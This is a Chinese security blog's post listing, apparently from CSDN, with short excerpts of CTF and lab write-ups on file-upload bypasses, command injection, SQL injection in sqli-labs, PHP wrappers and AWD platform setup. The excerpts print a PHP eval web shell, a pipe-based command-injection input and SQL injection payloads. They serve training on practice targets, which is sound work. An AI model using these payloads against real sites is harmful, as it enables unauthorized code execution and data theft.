- 博客(9)
- 收藏
- 关注
RSS订阅原创 记录第一次AWDplus线下--“陇警杯”
题比赛介绍AWDplus和AWD有很大的区别,类似于CTF。只是赛题只有web+pwn,除了正常的打出flag还加上了题目修复。攻击于防御介绍1、攻击于防御环节采用动态攻防兼备的比赛模式,综合考核参赛战队的漏洞发现、漏洞挖掘、漏洞修复以及即时策略能力。2、战队得分:攻防部分积分为攻击得分和防御得分的总分,成功利用漏洞获得flag并提交成功就会再积分轮次内获得该题的攻击分,成功修补漏洞并通过平台check,在积分轮次内就会获得该题的防御分。服务器异常时会被扣分。3、某参赛队的题目服务器出现异常导致无
2021-05-16 22:52:03
9503
6
原创 [GXYCTF2019]BabyUpload
考点:.htaccess文件上传<script language="pHp">@eval($_POST['a'])</script>上传类型,先上传一个图片类型的马子发现检测了上传内容,换个一句话(不带<?php的)<script language="pHp">@eval($_POST['a'])</script>发现可以成功上传,紧接着换成php 发现对文件名也有检测试试不存在的文件名,以此来判断是否白名单限制可以上传,以
2021-02-05 10:18:29
361
原创 CTFhub——命令执行
目录NO.1 无过滤注入NO.2 过滤catNO.3 过滤空格NO.4 过滤目录分隔符NO.5 过滤运算符NO.6 综合过滤练习NO.1 无过滤注入<?php$res = FALSE;if (isset($_GET['ip']) && $_GET['ip']) { $cmd = "ping -c 4 {$_GET['ip']}"; exec($cmd, $res);}?>代码中没有任何过滤?ip=|cat 307092239529587.p
2021-02-04 15:54:45
1208
原创 BUUCTF [MRCTF2020]你传你呢
考点:.htaccess文件上传先上传一个正常图片,发现成功上传而且能够访问。直接一个1.sdga丢上去,看看返回包。发现可以成功上传。可能有人到这里就懵了,为什么要上传1.sdga,它是个神马文件类型????对,这里我上传了一个不存在的文件类型,这样可以方便我们一下判断出是白名单还是黑名单限制。这里既然能够上传一个不存在的文件名,那么说明这里是黑名单限制,so接下来就是黑名单上传的招式咯。 看好了 别眨眼·~~~No.1:上传 .htaccessNo.2:上传 .user.ini
2021-02-04 11:25:35
639
原创 sqli-labs前十关记录
目录第一题:布尔报错注入第二题:布尔报错注入第三题: 布尔报错注入 ‘ 报错第四题:布尔报错注入“ 报错第五题:双查询注入 ' 注入开始解题:第六题: 双查询注入 " 报错第七题:导出文件GET字符型注第八题: 布尔盲注第九题:基于时间盲注 ' 报错第十题:基于时间盲注 " 报错第一题:布尔报错注入?id=1'?id=1' and 1=1--+确认漏洞是否存在?id=1' order by 3--+确定字段数?id=-1' union select 1,2,3--+确定显示位置
2021-01-29 15:27:24
550
原创 upload-labs(12-21)通关教程
目录第十二关:%00截断上传第十三关:00截断第十四关:图片马+文件包含漏洞第十五关:图片马+文件包含漏洞第十六关:图片马+文件包含漏洞第十七关:图片马+二次渲染+文件包含第十八关:条件竞争第十九关:条件竞争第二十关:空格绕过第二十一关:/ + 数组 绕过第十二关:%00截断上传从这一关开始,就是白名单上传了。前一期已经对白名单进行了解释,在这就不再BB了$is_upload = false;$msg = null;if(isset($_POST['submit'])){ $ext_arr
2021-01-29 11:47:55
3148
原创 upload-labs搭建及前11关过关教程
使用phpstudy搭建Uploads-labs链接:https://pan.baidu.com/s/1lMRBVdQyFuKOgNlWPUoSSQ 提取码:8mmv 下载后,解压修改名字:upload-labs,然后移动到phpstudy网站目录:phpstudy\www(根据自己的网站目录决定),若网站根目录下存在多个目录,记得打开允许目录列表,打开方法:其他选项菜单—phpStudy设置—允许目录列表。在upload-labs目录下创建一个upload文件夹启动phpstudy在浏览器输入
2021-01-29 10:49:06
1261
原创 文件包含与PHP伪协议实战演练
目录一、PHP中造成文件包含的四个函数二、本地文件包含、远程文件包含的区别三、PHP伪协议测试代码目标文件常用协议1、目录遍历获取flag2、php://input、php://filter3、file://4、data://5、zip://一、PHP中造成文件包含的四个函数1、include() 、require()当使用include()函数包含文件时,只有代码执行到 include() 函数时才将文件包含进来,发生错误时只给出一个警告,继续向下执行。当使用require()函数包含文件时,只要
2021-01-28 10:54:10
502
原创 AWD平台搭建--Cardinal
AWD搭建步骤一、前提摘要二、环境准备三、启动mysql,创建数据库四、搭建Cardinal平台五、靶机搭建六、Cardinal上部署靶机七、连接Asteroid大屏先看一个成品炫酷图一、前提摘要Cardinal由Vidar-Team团队开发,接受并允许各大高校、安全团队、技术爱好者使用 Cardinal 作为比赛训练平台或举办内部训练赛。但不允许在未经许可授权的情况下,使用 Cardinal 的代码、文档、相关软件等开展商业培训、商业比赛、产品销售等任何营利性行为。禁止恶意更换、去除 Cardi
2021-01-28 10:30:12
8659
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人